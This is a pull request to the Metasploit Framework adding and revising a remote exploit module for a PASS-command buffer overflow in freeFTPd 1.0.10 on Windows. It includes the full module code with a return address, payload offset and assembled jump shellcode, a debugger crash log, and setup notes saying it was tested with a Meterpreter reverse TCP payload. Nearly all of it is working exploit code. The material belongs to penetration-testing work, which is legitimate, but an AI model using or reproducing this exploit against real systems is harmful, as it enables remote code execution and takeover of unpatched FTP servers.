### PR TITLE
added freeFTPd 1.0.10 (PASS Command) universal

### DIFF
--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking 
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::Ftp
 
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
         may allow a remote attacker to cause a buffer overflow, resulting in a denial of
         service or potentially allowing the execution of arbitrary code.
 
-        FreeFTPd must have account authorization anonymous user account enabled.
+        FreeFTPd must have an account set to authorization anonymous user account.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -40,10 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
           'BadChars'   => "\x00\x0a\x0d",
         },
       'Platform'       => 'win',
-      'Arch'           => 'ARCH_X86',
+      'Arch'           => [ ARCH_X86 ],
       'Targets'        =>
         [
-          ['freeFTPd 10.0.10 on Windows (universal)',
+          ['freeFTPd 10.0.10 on Windows Desktop Version',
             {
               'Ret'    => 0x004142f0, # pop ebp # pop ebx # ret 0x04 [FreeFTPDService.exe]
               'Offset' => 801,
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # All versions including and above version 1.0 report
     # "220 Hello, I'm freeFTPd 1.0" when banner grabbing
-    if banner =~ /freeFTPd 1.0/
+    if banner =~ /freeFTPd 1\.0/
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => [ ARCH_X86 ],
       'Targets'        =>
         [
-          ['freeFTPd 10.0.10 on Windows Desktop Version',
+          ['freeFTPd 1.0.10 on Windows Desktop Version',
             {
               'Ret'    => 0x004142f0, # pop ebp # pop ebx # ret 0x04 [FreeFTPDService.exe]
               'Offset' => 801,

--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -16,10 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "freeFTPd 1.0.10 and below (PASS Command)",
       'Description'    => %q{
-        freeFTPd contains an overflow condition that is triggered as user-supplied input
-        is not properly validated when handling a specially crafted PASS command. This
-        may allow a remote attacker to cause a buffer overflow, resulting in a denial of
-        service or potentially allowing the execution of arbitrary code.
+        freeFTPd 1.0.10 and below contains an overflow condition that is triggered as
+        user-supplied input is not properly validated when handling a specially crafted
+        PASS command. This may allow a remote attacker to cause a buffer overflow,
+        resulting in a denial of service or potentially allowing the execution of
+        arbitrary code.
 
         FreeFTPd must have an account set to authorization anonymous user account.
       },
@@ -85,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
     connect
     print_status("Trying target #{target.name} with user #{user()}...")
 
-    off = target['Offset'] - 9 # 9 => length of jump to get back to sc
+    off = target['Offset'] - 9
 
     bof = payload.encoded
     bof << rand_text(off - payload.encoded.length)

--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "freeFTPd 1.0.10 (PASS Command)",
+      'Name'           => "freeFTPd 1.0.10 and below (PASS Command)",
       'Description'    => %q{
         freeFTPd contains an overflow condition that is triggered as user-supplied input
         is not properly validated when handling a specially crafted PASS command. This
@@ -43,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => [ ARCH_X86 ],
       'Targets'        =>
         [
-          ['freeFTPd 1.0.10 on Windows Desktop Version',
+          ['freeFTPd 1.0.10 and below on Windows Desktop Version',
             {
-              'Ret'    => 0x004142f0, # pop ebp # pop ebx # ret 0x04 [FreeFTPDService.exe]
+              'Ret'    => 0x004014bb, # pop edi # pop esi # ret 0x04 [FreeFTPDService.exe]
               'Offset' => 801,
             }
           ],

--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -1,0 +1,101 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking 
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "freeFTPd 1.0.10 (PASS Command)",
+      'Description'    => %q{
+        freeFTPd contains an overflow condition that is triggered as user-supplied input
+        is not properly validated when handling a specially crafted PASS command. This
+        may allow a remote attacker to cause a buffer overflow, resulting in a denial of
+        service or potentially allowing the execution of arbitrary code.
+
+        FreeFTPd must have account authorization anonymous user account enabled.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Wireghoul', # Vulnerability discovery
+          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['OSVDB', '96517'],
+          ['EDB',   '27747'],
+          ['BID',   '61905']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x0a\x0d",
+        },
+      'Platform'       => 'win',
+      'Arch'           => 'ARCH_X86',
+      'Targets'        =>
+        [
+          ['freeFTPd 10.0.10 on Windows (universal)',
+            {
+              'Ret'    => 0x004142f0, # pop ebp # pop ebx # ret 0x04 [FreeFTPDService.exe]
+              'Offset' => 801,
+            }
+          ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 20 2013",
+      'DefaultTarget'  => 0))
+
+    register_options([
+      OptString.new('FTPUSER', [ true, 'The username to authenticate with', 'anonymous' ]),
+
+    ], self.class)
+
+    # We're triggering the bug via the PASS command, no point to have pass as configurable
+    # option.
+    deregister_options('FTPPASS')
+
+  end
+
+  def check
+
+    connect
+    disconnect
+
+    # All versions including and above version 1.0 report
+    # "220 Hello, I'm freeFTPd 1.0" when banner grabbing
+    if banner =~ /freeFTPd 1.0/
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+
+    end
+  end
+
+  def exploit
+
+    connect
+    print_status("Trying target #{target.name} with user #{user()}...")
+
+    off = target['Offset'] - 9 # 9 => length of jump to get back to sc
+
+    bof = payload.encoded
+    bof << rand_text(off - payload.encoded.length)
+    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
+    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
+    bof << rand_text(2)
+    bof << [target.ret].pack('V')
+
+    send_user(datastore['FTPUSER'])
+    send_pass(bof)
+
+  end
+end

--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "freeFTPd 1.0.10 and below (PASS Command)",
+      'Name'           => "freeFTPd PASS Command Buffer Overflow",
       'Description'    => %q{
         freeFTPd 1.0.10 and below contains an overflow condition that is triggered as
         user-supplied input is not properly validated when handling a specially crafted
@@ -27,14 +27,15 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Wireghoul', # Vulnerability discovery
+          'Wireghoul', # Initial discovery, PoC
           'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
         ],
       'References'     =>
         [
           ['OSVDB', '96517'],
           ['EDB',   '27747'],
-          ['BID',   '61905']
+          ['BID',   '61905'],
+          ['URL',   'http://www.freesshd.com']
         ],
       'Payload'        =>
         {
@@ -71,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
     connect
     disconnect
 
-    # All versions including and above version 1.0 report
-    # "220 Hello, I'm freeFTPd 1.0" when banner grabbing
+    # All versions including and above version 1.0 report "220 Hello, I'm freeFTPd 1.0"
+    # when banner grabbing.
     if banner =~ /freeFTPd 1\.0/
       return Exploit::CheckCode::Detected
     else
@@ -100,3 +101,27 @@ class Metasploit3 < Msf::Exploit::Remote
 
   end
 end
+
+=begin
+(c78.ea4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0012b324 ebx=01805f28 ecx=00000019 edx=00000057 esi=4141413d edi=00181e18
+eip=76c23e8d esp=0012b310 ebp=0012b328 iopl=0         nv up ei pl nz na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
+OLEAUT32!SysFreeString+0x55:
+76c23e8d ff36            push    dword ptr [esi]      ds:0023:4141413d=????????
+
+FAULTING_IP:
+OLEAUT32!SysFreeString+55
+76c23e8d ff36            push    dword ptr [esi]
+
+EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 76c23e8d (OLEAUT32!SysFreeString+0x00000055)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000000
+   Parameter[1]: 4141413d
+Attempt to read from address 4141413d
+=end


### PR DESCRIPTION
Tested on:
Microsoft Windows [Version 6.1.7601]
Microsoft Windows XP [Version 5.1.2600]

PPR address from module:
FreeFTPDService.exe

Tested with payload:
windows/meterpreter/reverse_tcp
windows/exec

Instructions on setup:
Launch freeFTPd and go to Users
Add an account with Authorization: anonymous user account
Mark 'User can access: FTP Server' and click Click 'Apply'
Go to FTP and click on 'Start'
